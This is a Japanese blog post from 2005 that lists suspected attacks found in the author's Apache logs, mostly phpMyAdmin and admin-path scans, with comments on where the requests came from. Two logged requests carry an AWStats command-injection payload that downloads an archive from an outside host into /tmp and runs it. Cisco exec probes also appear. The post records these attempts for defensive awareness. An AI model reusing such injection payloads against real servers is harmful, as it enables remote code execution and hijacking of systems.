Linux

不正アクセス一覧(2005-08)

2005年8月25日

 ここに、不正(だと思われる)アクセスの一覧を載せておくことにした。現在の所、phpMyAdminを狙ったものが多いようである。


[client 66.235.201.110] File does not exist: /var/www/phpmyadmin
[client 220.31.148.181] File does not exist: /var/www/phpmyadmin
[client 220.31.148.181] File does not exist: /var/www/PhpMyAdmin
[client 220.31.148.181] File does not exist: /var/www/PMA
[client 220.31.148.181] File does not exist: /var/www/pma
[client 220.31.148.181] File does not exist: /var/www/mysql
[client 220.31.148.181] File does not exist: /var/www/MySQL
[client 67.69.164.76] File does not exist: /var/www/phpmyadmin
[client 207.14.166.253] File does not exist: /var/www/phpmyadmin
[client 207.14.166.253] File does not exist: /var/www/PMA
[client 207.14.166.253] File does not exist: /var/www/mysql
[client 207.14.166.253] File does not exist: /var/www/admin
[client 207.14.166.253] File does not exist: /var/www/dbadmin
[client 207.14.166.253] File does not exist: /var/www/db
[client 207.14.166.253] File does not exist: /var/www/web
[client 207.14.166.253] File does not exist: /var/www/admin
[client 207.14.166.253] File does not exist: /var/www/admin
[client 207.14.166.253] File does not exist: /var/www/admin
[client 207.14.166.253] File does not exist: /var/www/mysql-admin
[client 207.14.166.253] File does not exist: /var/www/phpmyadmin2
[client 207.14.166.253] File does not exist: /var/www/mysqladmin
[client 207.14.166.253] File does not exist: /var/www/mysql-admin
[client 207.14.166.253] script '/var/www/main.php' not found or unable to stat
[client 207.14.166.253] File does not exist: /var/www/phpMyAdmin-2.5.6
[client 193.134.2.196] File does not exist: /var/www/phpmyadmin
[client 193.134.2.196] File does not exist: /var/www/phpmyadmin
[client 218.83.234.212] script not found or unable to stat: /usr/lib/cgi-bin/article.cgi
[client 193.134.2.196] File does not exist: /var/www/phpmyadmin
[client 193.134.2.196] File does not exist: /var/www/phpmyadmin
[client 218.38.58.3] File does not exist: /var/www/renamed_scripts
218.234.17.219"GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;cd%20.a;wget%20http://dapictures.com/catalog/images/qmail.tgz;tar%20-xzvf%20qmail.tgz;cd%20qmail;./start;echo%20;echo| HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
218.234.17.219 "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;cd%20.a;wget%20http://dapictures.com/catalog/images/qmail.tgz;tar%20-xzvf%20qmail.tgz;cd%20qmail;./start;echo%20;echo| HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
61.52.31.94 "GET /level/16/exec/-///pwd HTTP/1.0"
61.53.11.91 "GET /level/16/exec/-///pwd HTTP/1.0"
60.26.132.220 "GET /level/16/exec/-///pwd HTTP/1.0"
210.162.34.170 "GET /level/16/exec/-///pwd HTTP/1.0"

コメント

Katsumi (2005年8月28日 21:38:55)

IP address:207.14.166.253 は、cave2.cavenet.comであり、web site まで存在する。cavenet 自体が不正アクセスを試みているのか、cavenetのサーバが誰かに乗っ取られているのかは不明。

Katsumi (2005年8月29日 19:09:50)

218.234.17.219からの接続は、dapictures.comから改変したqmail(メーラ)をダウンロードしてインストールし、悪態をつくようなメールを送信するようにするスクリプトらしい。

コメント送信